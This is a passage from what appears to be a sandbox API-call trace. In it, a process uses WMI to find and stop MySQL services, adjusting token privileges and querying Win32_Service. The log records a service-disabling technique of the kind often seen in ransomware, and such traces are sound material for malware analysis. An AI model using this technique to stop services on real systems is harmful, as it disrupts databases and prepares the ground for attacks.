varVal2=0x1), plFlavor=0x0) returned 0x0 [0248.694] free (_Block=0x3ccba0) [0248.694] malloc (_Size=0x18) returned 0x3ccba0 [0248.694] IWbemClassObject:Get (in: This=0x1d2c4a0, wszName="ReturnValue", lFlags=0, pVal=0x16c9d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x16c8b8*=1493248, plFlavor=0x0 | out: pVal=0x16c9d8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x16c8b8*=19, plFlavor=0x0) returned 0x0 [0248.694] malloc (_Size=0x18) returned 0x3ccbc0 [0248.694] IWbemQualifierSet:Get (in: This=0x1cf13b0, wszName="read", lFlags=0, pVal=0x16c8c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff702ac0), plFlavor=0x0 | out: pVal=0x16c8c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff702ac0), plFlavor=0x0) returned 0x80041002 [0248.694] free (_Block=0x3ccbc0) [0248.694] malloc (_Size=0x18) returned 0x3ccbc0 [0248.694] IWbemQualifierSet:Get (in: This=0x1cf13b0, wszName="write", lFlags=0, pVal=0x16c8c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff702ac0), plFlavor=0x0 | out: pVal=0x16c8c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff702ac0), plFlavor=0x0) returned 0x80041002 [0248.694] free (_Block=0x3ccbc0) [0248.695] malloc (_Size=0x18) returned 0x3ccbc0 [0248.695] malloc (_Size=0x18) returned 0x3ccbe0 [0248.695] IWbemQualifierSet:Get (in: This=0x1cf13b0, wszName="Description", lFlags=0, pVal=0x16c970*(varType=0x0, wReserved1=0x16, wReserved2=0x0, wReserved3=0x0, varVal1=0xff6a4293, varVal2=0x16c978), plFlavor=0x0 | out: pVal=0x16c970*(varType=0x0, wReserved1=0x16, wReserved2=0x0, wReserved3=0x0, varVal1=0xff6a4293, varVal2=0x16c978), plFlavor=0x0) returned 0x80041002 [0248.695] free (_Block=0x3ccbe0) [0248.695] malloc (_Size=0x18) returned 0x3ccbe0 [0248.695] lstrlenA (lpString="Not Available") returned 13 [0248.695] malloc (_Size=0x1c) returned 0x3cd060 [0248.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff6922f0, cbMultiByte=-1, lpWideCharStr=0x3cd060, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0248.695] free (_Block=0x3cd060) [0248.695] IUnknown:Release (This=0x1cf13b0) returned 0x0 [0248.695] malloc (_Size=0x48) returned 0x3cd060 [0248.695] malloc (_Size=0x18) returned 0x3ccc00 [0248.695] malloc (_Size=0x48) returned 0x3cd0b0 [0248.695] malloc (_Size=0x70) returned 0x3cd100 [0248.695] malloc (_Size=0x48) returned 0x3cd180 [0248.695] free (_Block=0x3cd0b0) [0248.695] free (_Block=0x3cd060) [0248.695] free (_Block=0x3cd010) [0248.696] free (_Block=0x3ccbc0) [0248.696] free (_Block=0x3ccbe0) [0248.696] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0248.696] IWbemClassObject:GetMethodQualifierSet (in: This=0x1d2bfa0, wszMethod="StopService", ppQualSet=0x16cfd8 | out: ppQualSet=0x16cfd8*=0x1cf13b0) returned 0x0 [0248.696] malloc (_Size=0x18) returned 0x3ccbe0 [0248.696] IWbemQualifierSet:Get (in: This=0x1cf13b0, wszName="Implemented", lFlags=0, pVal=0x16cfe8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d413c0513b4, varVal2=0xff6a44fb), plFlavor=0x0 | out: pVal=0x16cfe8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d413c0513b4, varVal2=0xff6a44fb), plFlavor=0x0) returned 0x80041002 [0248.696] free (_Block=0x3ccbe0) [0248.696] malloc (_Size=0x18) returned 0x3ccbe0 [0248.696] malloc (_Size=0x18) returned 0x3ccbc0 [0248.696] IWbemQualifierSet:Get (in: This=0x1cf13b0, wszName="Description", lFlags=0, pVal=0x16d000*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff702948, varVal2=0x83c), plFlavor=0x0 | out: pVal=0x16d000*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x83c), plFlavor=0x0) returned 0x0 [0248.696] free (_Block=0x3ccbc0) [0248.696] malloc (_Size=0x18) returned 0x3ccbc0 [0248.696] IUnknown:Release (This=0x1cf13b0) returned 0x0 [0248.697] malloc (_Size=0x70) returned 0x3cd010 [0248.697] malloc (_Size=0x70) returned 0x3cd1d0 [0248.697] malloc (_Size=0x48) returned 0x3cd090 [0248.697] malloc (_Size=0x18) returned 0x3ccc20 [0248.697] malloc (_Size=0x70) returned 0x3cd250 [0248.697] malloc (_Size=0x70) returned 0x3cd2d0 [0248.697] malloc (_Size=0x48) returned 0x3cd350 [0248.697] malloc (_Size=0x50) returned 0x3cd3a0 [0248.697] malloc (_Size=0x70) returned 0x3cd400 [0248.697] malloc (_Size=0x70) returned 0x3cd480 [0248.697] malloc (_Size=0x48) returned 0x3cd500 [0248.697] free (_Block=0x3cd350) [0248.697] free (_Block=0x3cd2d0) [0248.697] free (_Block=0x3cd250) [0248.697] free (_Block=0x3cd090) [0248.697] free (_Block=0x3cd1d0) [0248.697] free (_Block=0x3cd010) [0248.697] IUnknown:Release (This=0x1d2c4a0) returned 0x0 [0248.697] free (_Block=0x3cd180) [0248.697] free (_Block=0x3cd100) [0248.697] free (_Block=0x3ccf90) [0248.697] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x16d098*=0x0, ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x0 | out: pstrName=0x16d098*="PauseService", ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x1d2c4a0) returned 0x0 [0248.697] lstrlenW (lpString="PauseService") returned 12 [0248.697] lstrlenW (lpString="stopservice") returned 11 [0248.697] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0248.697] IUnknown:Release (This=0x1d2c4a0) returned 0x0 [0248.697] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x16d098*=0x0, ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x0 | out: pstrName=0x16d098*="ResumeService", ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x1d2c4a0) returned 0x0 [0248.697] lstrlenW (lpString="ResumeService") returned 13 [0248.697] lstrlenW (lpString="stopservice") returned 11 [0248.698] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0248.698] IUnknown:Release (This=0x1d2c4a0) returned 0x0 [0248.698] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x16d098*=0x0, ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x0 | out: pstrName=0x16d098*="InterrogateService", ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x1d2c4a0) returned 0x0 [0248.698] lstrlenW (lpString="InterrogateService") returned 18 [0248.698] lstrlenW (lpString="stopservice") returned 11 [0248.698] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0248.698] IUnknown:Release (This=0x1d2c4a0) returned 0x0 [0248.698] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x16d098*=0x0, ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x0 | out: pstrName=0x16d098*="UserControlService", ppInSignature=0x16d0a0*=0x1d2c520, ppOutSignature=0x16d0a8*=0x1d2ca20) returned 0x0 [0248.698] lstrlenW (lpString="UserControlService") returned 18 [0248.698] lstrlenW (lpString="stopservice") returned 11 [0248.698] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0248.698] IUnknown:Release (This=0x1d2c520) returned 0x0 [0248.698] IUnknown:Release (This=0x1d2ca20) returned 0x0 [0248.698] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x16d098*=0x0, ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x0 | out: pstrName=0x16d098*="Create", ppInSignature=0x16d0a0*=0x1d2e470, ppOutSignature=0x16d0a8*=0x1d2e970) returned 0x0 [0248.699] lstrlenW (lpString="Create") returned 6 [0248.699] lstrlenW (lpString="stopservice") returned 11 [0248.699] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0248.699] IUnknown:Release (This=0x1d2e470) returned 0x0 [0248.699] IUnknown:Release (This=0x1d2e970) returned 0x0 [0248.699] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x16d098*=0x0, ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x0 | out: pstrName=0x16d098*="Change", ppInSignature=0x16d0a0*=0x1d2e1f0, ppOutSignature=0x16d0a8*=0x1d2e6f0) returned 0x0 [0248.699] lstrlenW (lpString="Change") returned 6 [0248.699] lstrlenW (lpString="stopservice") returned 11 [0248.700] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0248.700] IUnknown:Release (This=0x1d2e1f0) returned 0x0 [0248.700] IUnknown:Release (This=0x1d2e6f0) returned 0x0 [0248.700] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x16d098*=0x0, ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x0 | out: pstrName=0x16d098*="ChangeStartMode", ppInSignature=0x16d0a0*=0x1d2c610, ppOutSignature=0x16d0a8*=0x1d2cb10) returned 0x0 [0248.700] lstrlenW (lpString="ChangeStartMode") returned 15 [0248.700] lstrlenW (lpString="stopservice") returned 11 [0248.700] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0248.700] IUnknown:Release (This=0x1d2c610) returned 0x0 [0248.700] IUnknown:Release (This=0x1d2cb10) returned 0x0 [0248.700] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x16d098*=0x0, ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x0 | out: pstrName=0x16d098*="Delete", ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x1d2c4a0) returned 0x0 [0248.700] lstrlenW (lpString="Delete") returned 6 [0248.700] lstrlenW (lpString="stopservice") returned 11 [0248.700] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0248.700] IUnknown:Release (This=0x1d2c4a0) returned 0x0 [0248.700] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x16d098*=0x0, ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x0 | out: pstrName=0x16d098*="GetSecurityDescriptor", ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x1d2c640) returned 0x0 [0248.700] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0248.700] lstrlenW (lpString="stopservice") returned 11 [0248.700] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0248.701] IUnknown:Release (This=0x1d2c640) returned 0x0 [0248.701] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x16d098*=0x0, ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x0 | out: pstrName=0x16d098*="SetSecurityDescriptor", ppInSignature=0x16d0a0*=0x1d2c520, ppOutSignature=0x16d0a8*=0x1d2ca20) returned 0x0 [0248.701] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0248.701] lstrlenW (lpString="stopservice") returned 11 [0248.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0248.701] IUnknown:Release (This=0x1d2c520) returned 0x0 [0248.701] IUnknown:Release (This=0x1d2ca20) returned 0x0 [0248.701] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x16d098*=0x0, ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x0 | out: pstrName=0x16d098*=0x0, ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x0) returned 0x40005 [0248.701] IUnknown:Release (This=0x1d2bfa0) returned 0x0 [0248.701] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0248.701] lstrlenW (lpString="SET") returned 3 [0248.701] lstrlenW (lpString="call") returned 4 [0248.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0248.701] lstrlenW (lpString="CREATE") returned 6 [0248.701] lstrlenW (lpString="call") returned 4 [0248.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0248.701] free (_Block=0x3c8640) [0248.701] malloc (_Size=0x8) returned 0x3c7140 [0248.701] lstrlenW (lpString="GET") returned 3 [0248.701] lstrlenW (lpString="call") returned 4 [0248.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0248.701] lstrlenW (lpString="LIST") returned 4 [0248.701] lstrlenW (lpString="call") returned 4 [0248.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0248.701] lstrlenW (lpString="ASSOC") returned 5 [0248.701] lstrlenW (lpString="call") returned 4 [0248.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0248.702] WbemLocator:IUnknown:AddRef (This=0x1cf1390) returned 0x3 [0248.702] free (_Block=0x3c7fb0) [0248.702] lstrlenW (lpString="") returned 0 [0248.702] lstrlenW (lpString="XDUWTFONO") returned 9 [0248.702] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0248.702] lstrlenW (lpString="XDUWTFONO") returned 9 [0248.702] malloc (_Size=0x14) returned 0x3ccc40 [0248.702] lstrlenW (lpString="XDUWTFONO") returned 9 [0248.702] GetCurrentThreadId () returned 0x83c [0248.702] GetCurrentProcess () returned 0xffffffffffffffff [0248.702] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x16f3e0 | out: TokenHandle=0x16f3e0*=0x29c) returned 1 [0248.702] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16f3d8 | out: TokenInformation=0x0, ReturnLength=0x16f3d8) returned 0 [0248.702] malloc (_Size=0x118) returned 0x3ccf90 [0248.702] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x3, TokenInformation=0x3ccf90, TokenInformationLength=0x118, ReturnLength=0x16f3d8 | out: TokenInformation=0x3ccf90, ReturnLength=0x16f3d8) returned 1 [0248.702] AdjustTokenPrivileges (in: TokenHandle=0x29c, DisableAllPrivileges=0, NewState=0x3ccf90*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=2081443125, Attributes=0x7ef0), (Luid.LowPart=0x0, Luid.HighPart=3960720, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=33554434, Attributes=0x7ee7), (Luid.LowPart=0x0, Luid.HighPart=3932504, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=151060488, Attributes=0x10007eed))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0248.702] free (_Block=0x3ccf90) [0248.702] CloseHandle (hObject=0x29c) returned 1 [0248.702] lstrlenW (lpString="GET") returned 3 [0248.702] lstrlenW (lpString="call") returned 4 [0248.702] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0248.702] lstrlenW (lpString="LIST") returned 4 [0248.702] lstrlenW (lpString="call") returned 4 [0248.702] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0248.702] lstrlenW (lpString="SET") returned 3 [0248.702] lstrlenW (lpString="call") returned 4 [0248.702] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0248.702] lstrlenW (lpString="CALL") returned 4 [0248.702] lstrlenW (lpString="call") returned 4 [0248.702] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0248.703] ??0CHString@@QEAA@XZ () returned 0x16f390 [0248.703] GetCurrentThreadId () returned 0x83c [0248.703] malloc (_Size=0x18) returned 0x3ccc60 [0248.703] malloc (_Size=0x18) returned 0x3ccc80 [0248.703] malloc (_Size=0x18) returned 0x3ccca0 [0248.703] malloc (_Size=0x18) returned 0x3cccc0 [0248.703] malloc (_Size=0x18) returned 0x3ccce0 [0248.703] SysStringLen (param_1="\\\\") returned 0x2 [0248.703] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0248.703] malloc (_Size=0x18) returned 0x3ccd00 [0248.703] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0248.703] SysStringLen (param_1="\\") returned 0x1 [0248.703] malloc (_Size=0x18) returned 0x3cd580 [0248.703] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0248.703] SysStringLen (param_1="root\\cimv2") returned 0xa [0248.703] free (_Block=0x3ccd00) [0248.703] free (_Block=0x3ccce0) [0248.704] free (_Block=0x3cccc0) [0248.704] free (_Block=0x3ccca0) [0248.704] free (_Block=0x3ccc80) [0248.704] free (_Block=0x3ccc60) [0248.704] malloc (_Size=0x18) returned 0x3ccc60 [0248.704] malloc (_Size=0x18) returned 0x3ccc80 [0248.704] malloc (_Size=0x18) returned 0x3ccca0 [0248.704] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cf1390, strNetworkResource="\\\\XDUWTFONO\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff7029d0 | out: ppNamespace=0xff7029d0*=0x1d03b28) returned 0x0 [0248.709] free (_Block=0x3ccca0) [0248.709] free (_Block=0x3ccc80) [0248.709] free (_Block=0x3ccc60) [0248.709] CoSetProxyBlanket (pProxy=0x1d03b28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0248.709] free (_Block=0x3cd580) [0248.709] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0248.709] ??0CHString@@QEAA@XZ () returned 0x16f138 [0248.709] GetCurrentThreadId () returned 0x83c [0248.709] malloc (_Size=0x70) returned 0x3ccf90 [0248.709] malloc (_Size=0x50) returned 0x3cd010 [0248.709] malloc (_Size=0x50) returned 0x3cd070 [0248.710] malloc (_Size=0x70) returned 0x3cd0d0 [0248.710] malloc (_Size=0x70) returned 0x3cd150 [0248.710] malloc (_Size=0x48) returned 0x3cd1d0 [0248.710] malloc (_Size=0x18) returned 0x3ccc60 [0248.710] lstrlenA (lpString="") returned 0 [0248.710] malloc (_Size=0x2) returned 0x3c7fb0 [0248.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff69314c, cbMultiByte=-1, lpWideCharStr=0x3c7fb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0248.710] free (_Block=0x3c7fb0) [0248.710] malloc (_Size=0x70) returned 0x3cd220 [0248.710] malloc (_Size=0x48) returned 0x3cd2a0 [0248.710] malloc (_Size=0x18) returned 0x3ccc80 [0248.710] free (_Block=0x3ccc60) [0248.710] IWbemServices:GetObject (in: This=0x1d03b28, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x16f168*=0x0, ppCallResult=0x0 | out: ppObject=0x16f168*=0x1d2c030, ppCallResult=0x0) returned 0x0 [0248.727] malloc (_Size=0x18) returned 0x3ccc60 [0248.727] IWbemClassObject:GetMethod (in: This=0x1d2c030, wszName="stopservice", lFlags=0, ppInSignature=0x16f160, ppOutSignature=0x16f178 | out: ppInSignature=0x16f160*=0x0, ppOutSignature=0x16f178*=0x1d2c530) returned 0x0 [0248.728] free (_Block=0x3ccc60) [0248.728] IUnknown:Release (This=0x1d2c530) returned 0x0 [0248.728] IUnknown:Release (This=0x1d2c030) returned 0x0 [0248.728] ??0CHString@@QEAA@XZ () returned 0x16ef80 [0248.728] GetCurrentThreadId () returned 0x83c [0248.728] malloc (_Size=0x18) returned 0x3ccc60 [0248.728] lstrlenA (lpString="") returned 0 [0248.728] malloc (_Size=0x2) returned 0x3c7fb0 [0248.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff69314c, cbMultiByte=-1, lpWideCharStr=0x3c7fb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0248.728] free (_Block=0x3c7fb0) [0248.728] malloc (_Size=0x18) returned 0x3ccca0 [0248.728] lstrlenA (lpString="") returned 0 [0248.728] malloc (_Size=0x2) returned 0x3c7fb0 [0248.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff69314c, cbMultiByte=-1, lpWideCharStr=0x3c7fb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0248.728] free (_Block=0x3c7fb0) [0248.728] malloc (_Size=0x18) returned 0x3cccc0 [0248.728] free (_Block=0x3ccca0) [0248.728] malloc (_Size=0x18) returned 0x3ccca0 [0248.728] lstrlenA (lpString="SELECT * FROM ") returned 14 [0248.728] malloc (_Size=0x1e) returned 0x3cd2f0 [0248.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff694a40, cbMultiByte=-1, lpWideCharStr=0x3cd2f0, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0248.728] free (_Block=0x3cd2f0) [0248.728] malloc (_Size=0x18) returned 0x3ccce0 [0248.728] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0248.729] SysStringLen (param_1="Win32_Service") returned 0xd [0248.729] free (_Block=0x3ccca0) [0248.729] malloc (_Size=0x18) returned 0x3ccca0 [0248.729] malloc (_Size=0x18) returned 0x3ccd00 [0248.729] lstrlenA (lpString=" WHERE ") returned 7 [0248.729] malloc (_Size=0x10) returned 0x3cd580 [0248.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff693e20, cbMultiByte=-1, lpWideCharStr=0x3cd580, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0248.729] free (_Block=0x3cd580) [0248.729] malloc (_Size=0x18) returned 0x3cd580 [0248.729] SysStringLen (param_1=" WHERE ") returned 0x7 [0248.729] SysStringLen (param_1="name like '%%MySQL%%'") returned 0x15 [0248.729] malloc (_Size=0x18) returned 0x3cd5a0 [0248.729] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0248.729] SysStringLen (param_1=" WHERE name like '%%MySQL%%'") returned 0x1c [0248.729] free (_Block=0x3ccce0) [0248.729] free (_Block=0x3cd580) [0248.729] free (_Block=0x3ccd00) [0248.729] free (_Block=0x3ccca0) [0248.729] malloc (_Size=0x18) returned 0x3ccca0 [0248.729] IWbemServices:ExecQuery (in: This=0x1d03b28, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%MySQL%%'", lFlags=48, pCtx=0x0, ppEnum=0x16ef68 | out: ppEnum=0x16ef68*=0x1d03c28) returned 0x0 [0248.737] free (_Block=0x3ccca0) [0248.737] CoSetProxyBlanket (pProxy=0x1d03c28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0248.793] IEnumWbemClassObject:Next (in: This=0x1d03c28, lTimeout=-1, uCount=0x1, apObjects=0x16ef70, puReturned=0x16f0f8 | out: apObjects=0x16ef70*=0x0, puReturned=0x16f0f8*=0x0) returned 0x1 [0249.094] IUnknown:Release (This=0x1d03c28) returned 0x0 [0249.096] free (_Block=0x3cd5a0) [0249.096] free (_Block=0x3cccc0) [0249.096] free (_Block=0x3ccc60) [0249.096] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0249.096] free (_Block=0x3ccc80) [0249.096] free (_Block=0x3cd1d0) [0249.096] free (_Block=0x3cd150) [0249.096] free (_Block=0x3cd0d0) [0249.096] free (_Block=0x3cd070) [0249.096] free (_Block=0x3cd010) [0249.096] free (_Block=0x3cd2a0) [0249.096] free (_Block=0x3cd220) [0249.096] free (_Block=0x3ccf90) [0249.096] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0249.096] GetCurrentThreadId () returned 0x83c [0249.096] ??0CHString@@QEAA@PEBG@Z () returned 0x16f488 [0249.096] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x16f488 [0249.096] malloc (_Size=0x800) returned 0x3cdd50 [0249.096] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x3cdd50, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0249.097] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0249.097] malloc (_Size=0x1c) returned 0x3ccf90 [0249.097] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x3ccf90, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) 